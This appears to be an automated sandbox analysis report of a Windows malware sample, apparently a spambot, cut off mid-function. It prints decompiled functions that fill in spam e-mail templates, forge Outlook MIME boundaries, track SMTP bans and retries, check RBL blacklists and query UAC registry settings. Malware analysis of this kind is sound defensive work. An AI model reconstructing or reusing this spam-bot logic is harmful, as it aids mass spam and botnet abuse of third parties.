Similarity

API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
String ID: GetNetworkParams$iphlpapi.dll$~s`ysps
API String ID: 929413710-64764534
Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD89, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0040AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E004030B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
				}
				_t48 = E0040ECA5();
				_t77 = 0xe;
				_t50 = E0040ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0040EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}

0x0040ad89
0x0040ad8a
0x0040ad98
0x0040ada6
0x0040adba
0x0040adc6
0x0040adcb
0x0040add5
0x0040adeb
0x0040add7
0x0040addd
0x0040ade6
0x0040ade6
0x0040adf5
0x0040adfe
0x0040ae03
0x0040ae0f
0x0040ae18
0x0040ae1b
0x0040ae7f
0x0040ae81
0x0040ae83
0x00000000
0x00000000
0x0040ae31
0x0040ae3f
0x0040ae3f
0x0040ae43
0x0040ae4f
0x0040ae5e
0x0040ae6e
0x0040ae73
0x0040ae7a
0x0040ae7a
0x0040aea5
0x0040aeb6
0x0040aedc

APIs

GetLocalTime.KERNEL32(?), ref: 0040AD98
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6

Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F

Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2

wsprintfA.USER32 ref: 0040AEA5

Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9

wsprintfA.USER32 ref: 0040AE4F
wsprintfA.USER32 ref: 0040AE5E

Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0

Strings

----=_NextPart_%03d_%04X_%08.8lX.%08.8lX, xrefs: 0040AE49
%s%d, xrefs: 0040AE58
%04x%08.8lx$%08.8lx$%08x@%s, xrefs: 0040AE9F
%OUTLOOK_HST, xrefs: 0040AEC5
127.0.0.1, xrefs: 0040ADEB
%OUTLOOK_MID, xrefs: 0040AEAE
%OUTLOOK_BND_, xrefs: 0040AE0F, 0040AE14, 0040AE57, 0040AE76

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
API String ID: 3631595830-1816598006
Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55

Uniqueness

Uniqueness Score: -1.00%

Function 02239576, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 02239590
GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 022395BE
GetModuleFileNameA.KERNEL32(00000000), ref: 022395C5
wsprintfA.USER32 ref: 0223961E
wsprintfA.USER32 ref: 0223965C
wsprintfA.USER32 ref: 022396DD
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 02239741
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02239776
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 022397C1

Strings

PromptOnSecureDesktop, xrefs: 022395ED, 0223960D, 0223964B, 0223966C, 0223969F, 022396C8, 022396EA, 0223971D, 02239769, 022397A0

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
String ID: PromptOnSecureDesktop
API String ID: 3696105349-2980165447
Opcode ID: 3d5e61a764f0a53c7c2f84c748c6a2b46e492cfe2ec8a545598efa46f882ba96
Instruction ID: 4f74691702084e13c1abe1d6c6a73a81cd37db394b2f358a4d7f0166c03fe4ac
Opcode Fuzzy Hash: 3d5e61a764f0a53c7c2f84c748c6a2b46e492cfe2ec8a545598efa46f882ba96
Instruction Fuzzy Hash: 12A17EF2960208ABEB26DFE0DC44FDE3BADEB45740F104026FA05A6155E7B5C584CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F315, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 103networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(0040CA1D), ref: 0040F34D
socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
closesocket.WS2_32(00000000), ref: 0040F375

Strings

ps, xrefs: 0040F375, 0040F3A0
time_cfg, xrefs: 0040F323

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: closesockethtonssocket
String ID: ps$time_cfg
API String ID: 311057483-1008165782
Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE31, Relevance: 18.2, APIs: 6, Strings: 6, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x413638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x413634;
							}
						} else {
							_t51 = 0x413630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0040EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0040EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0040EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0040EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0040EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

0x0040be40
0x0040be43
0x0040be4c
0x0040be53
0x0040be71
0x0040be71
0x0040be77
0x0040be7a
0x0040bf62
0x0040bf6e
0x0040bf83
0x0040bf94
0x0040bf98
0x0040bf9d
0x0040bf9f
0x0040bf9f
0x0040bf85
0x0040bf85
0x0040bf85
0x0040bf70
0x0040bf70
0x0040bf70
0x0040bfa2
0x0040bfa7
0x0040bfab
0x00000000
0x0040bfad
0x0040bfad
0x0040bfaf
0x0040bfbe
0x0040bfb4
0x0040bfb9
0x0040bfba
0x0040bfbd
0x00000000
0x0040bfc8
0x0040bfab
0x0040be80
0x0040be83
0x0040be87
0x00000000
0x00000000
0x00000000
0x00000000
0x0040be8d
0x0040be8d
0x0040be92
0x0040be9b
0x0040be9b
0x0040be9c
0x0040be9d
0x0040bea3
0x00000000
0x00000000
0x0040bea9
0x0040beb1
0x0040beb6
0x0040beb7
0x0040bebc
0x00000000
0x00000000
0x0040bec6
0x0040becb
0x0040bece
0x0040bed2
0x0040bed6
0x0040bedb
0x0040bee1
0x0040bee4
0x0040bee7
0x0040beee
0x0040bef9
0x0040beff
0x0040bf01
0x0040bf01
0x0040bf02
0x0040bf06
0x0040bf0c
0x0040bf10
0x00000000
0x0040bf12
0x0040bf1c
0x0040bf23
0x0040bf26
0x0040bf2c
0x0040bf30
0x0040bf30
0x0040bf37
0x0040bf39
0x0040bf39
0x0040bf37
0x0040bf49
0x0040bf4c
0x00000000
0x0040bf4c
0x0040bf10
0x0040bf4f
0x0040bf4f
0x0040bf52
0x0040bf55
0x0040bf5a
0x00000000
0x0040be61
0x0040be67
0x0040be6b
0x0040bfcd
0x0040bfcd
0x0040bfcd
0x00000000
0x0040be6b

APIs

lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94

Strings

06A, xrefs: 0040BF70
smtp_ban, xrefs: 0040BE55, 0040BF77
46A, xrefs: 0040BF85
86A, xrefs: 0040BF98
smtp_retr, xrefs: 0040BE61, 0040BF8C
smtp_herr, xrefs: 0040BE46, 0040BF62

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi
String ID: 06A$46A$86A$smtp_ban$smtp_herr$smtp_retr
API String ID: 1586166983-142018493
Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3C5, Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
				E0040EF00( &_v132, "%FROM_EMAIL");
				E00405CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0040ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0040F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0040F133();
				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0040AD89( &_v132, _t83);
				E0040B211(0,  &_v132, 0);
				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 5);
				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 0xfffffffb);
				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}

0x0040b3e1
0x0040b3ef
0x0040b3ff
0x0040b40f
0x0040b411
0x0040b414
0x0040b416
0x0040b41a
0x0040b426
0x0040b439
0x0040b43b
0x0040b440
0x0040b440
0x0040b443
0x0040b453
0x0040b467
0x0040b47b
0x0040b485
0x0040b48e
0x0040b49a
0x0040b49f
0x0040b4a3
0x0040b4a4
0x0040b4a5
0x0040b4b6
0x0040b4bb
0x0040b4bc
0x0040b4c7
0x0040b4d8
0x0040b4e7
0x0040b4f8
0x0040b504
0x0040b515
0x0040b51e
0x0040b52b
0x0040b534

APIs

wsprintfA.USER32 ref: 0040B467

Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0

Strings

%P5DATE, xrefs: 0040B4F2
%FROM_DOMAIN, xrefs: 0040B41E
%M5DATE, xrefs: 0040B50F
%TO_HASH, xrefs: 0040B4B0
%TO_USER, xrefs: 0040B488
%DATE, xrefs: 0040B4D2
%s@%s, xrefs: 0040B461
%TO_EMAIL, xrefs: 0040B473
%TO_DOMAIN, xrefs: 0040B44B
%FROM_USER, xrefs: 0040B431
%FROM_EMAIL, xrefs: 0040B3E9

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$wsprintf
String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
API String ID: 1220175532-2340906255
Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9

Uniqueness

Uniqueness Score: -1.00%

Function 02231FE6, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 205libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 02232016
GetSystemInfo.KERNEL32(?), ref: 02232038
GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 02232053
GetProcAddress.KERNEL32(00000000), ref: 0223205A
GetCurrentProcess.KERNEL32(?), ref: 0223206B
GetTickCount.KERNEL32 ref: 02232219

Part of subcall function 02231E2F: GetComputerNameA.KERNEL32(?,0000000F), ref: 02231E65

Strings

localcfg, xrefs: 0223207A, 02232081, 02232094, 022320CD, 022320DC, 02232102, 02232121, 02232137, 0223214F, 0223216C, 02232184, 022321A0, 022321C0
hi_id, xrefs: 02232166, 0223216B, 02232183
flags_upd, xrefs: 0223208E, 02232093, 022320CC
work_srv, xrefs: 022320AE

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
String ID: flags_upd$hi_id$localcfg$work_srv
API String ID: 4207808166-1391650218
Opcode ID: d2b49178a9ec071114ead141a94fb7601baf71a17f262ffda1f9ad51580ac116
Instruction ID: 5947334192d8e84b29e420120453ac41ae92edc929dd541869b9e634adbf2c44
Opcode Fuzzy Hash: d2b49178a9ec071114ead141a94fb7601baf71a17f262ffda1f9ad51580ac116
Instruction Fuzzy Hash: 5551F6F0514348AFE331AFA58C84F6BBAECEF45704F00091DF99582256D7B9A948CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402011, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x412000 + _t102 * 4;
						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x4122dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
				_t45 = E0040F04E(0) -  *0x4122f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x4122e4; // 0x0
				if(_t122 > 0) {
					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x4122e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
							 *0x4122e4 = 0x4b0;
						}
					}
				}
				_t47 = E0040F04E(0) -  *0x4122f0;
				if(_t47 > 0x4b0) {
					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0040F04E(0);
					 *0x4122f0 = _t47;
				}
				return _t47;
			}

0x0040201e
0x00402020
0x0040202f
0x0040202f
0x0040203b
0x0040203d
0x0040204c
0x0040204c
0x00402058
0x0040205a
0x00402069
0x00402069
0x00402078
0x00402080
0x0040208e
0x00402090
0x00402095
0x0040209a
0x0040209c
0x004020a1
0x004020ab
0x00000000
0x004020ad
0x004020ad
0x004020bd
0x004020d0
0x004020d0
0x004020d0
0x00000000
0x00000000
0x00000000
0x004020bd
0x00000000
0x004020bf
0x004020bf
0x004020c0
0x004020c9
0x004020ce
0x004020d4
0x004020d6
0x004020d6
0x004020e5
0x004020e7
0x004020ec
0x004020f1
0x004020f3
0x004020f8
0x00402102
0x00000000
0x00402104
0x00402104
0x00402114
0x00402127
0x00402127
0x00402127
0x00000000
0x00000000
0x00000000
0x00402114
0x00000000
0x00402116
0x00402116
0x00402117
0x00402120
0x00402125
0x0040212b
0x0040212d
0x0040212d
0x0040213f
0x00402151
0x00402159
0x00402160
0x0040216a
0x00402170
0x00402189
0x00402197
0x0040219c
0x004021a1
0x004021c1
0x004021c1
0x004021a3
0x004021a3
0x004021a7
0x00000000
0x004021a9
0x004021ad
0x004021ae
0x004021b6
0x004021b9
0x004021b9
0x004021a7
0x004021a1
0x004021d1
0x004021da
0x004021e7
0x004021ed
0x004021f5
0x004021f5
0x00402204

APIs

GetTickCount.KERNEL32 ref: 00402078
GetTickCount.KERNEL32 ref: 004020D4
GetTickCount.KERNEL32 ref: 004020DB
GetTickCount.KERNEL32 ref: 0040212B
GetTickCount.KERNEL32 ref: 00402132
GetTickCount.KERNEL32 ref: 00402142

Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,73AFF210,80000001,00000000,0040E513,?,?,?,?,000000E4), ref: 0040F089
Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,73AFF210,80000001,00000000,0040E513,?,?,?,?,000000E4,000000C8), ref: 0040F093

Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899

Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1

Strings

rbl_ip, xrefs: 0040218F
localcfg, xrefs: 00402070, 00402160, 00402186, 00402194, 004021E4
net_type, xrefs: 004021DF
rbl_bl, xrefs: 00402181

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
String ID: localcfg$net_type$rbl_bl$rbl_ip
API String ID: 3976553417-1522128867
Opcode ID: 1bb6a535cad4af57600e8ff5f9866a63cd5bb7b68263ad928a3678253ee03cb3
Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
Opcode Fuzzy Hash: 1bb6a535cad4af57600e8ff5f9866a63cd5bb7b68263ad928a3678253ee03cb3
Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182
threadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0040A4C7(_t157);
